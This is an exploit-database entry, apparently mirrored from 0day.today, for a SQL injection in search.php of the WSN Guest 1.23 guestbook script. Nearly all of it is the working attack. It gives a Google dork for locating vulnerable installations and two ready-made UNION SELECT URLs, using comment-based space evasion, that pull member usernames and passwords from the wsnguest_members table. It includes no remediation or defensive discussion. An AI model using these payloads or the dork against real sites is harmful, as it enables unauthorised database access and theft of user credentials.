id: 4597
date: 01/04/2009
title: WSN Guest 1.23 (search) Remote SQL Injection Vulnerability
author: DaiMon
cves: 

==========================================================
WSN Guest 1.23 (search) Remote SQL Injection Vulnerability
==========================================================


WSN Guest 1.23 (search.php) SQL Injection Vulnerability
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Author    : DaiMon
Homepage  : http://www.cwdaimon.com
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Script       : WSN Guest
 
Last version : 1.23
Download     : http://scripts.webmastersite.net/wsnguest/wsnguest.zip
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
###########################
Google Dork:
allinurl:wsnguest
###########################
Exploat  :

Username :
          [path]/search.php?filled=1&action=advanced&whichtype=entries&searchfields[0]=ownerid&search=999/**/union/**/select/**/name%20text,1,2,3,4,5,6,7,8,9,10,11,12,13/**/from/**/wsnguest_members
Password :
          [path]/search.php?filled=1&action=advanced&whichtype=entries&searchfields[0]=ownerid&search=999/**/union/**/select/**/password,1,2,3,4,5,6,7,8,9,10,11,12,13/**/from/**/wsnguest_members
###########################
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
###########################



#  0day.today [2023-03-24]  #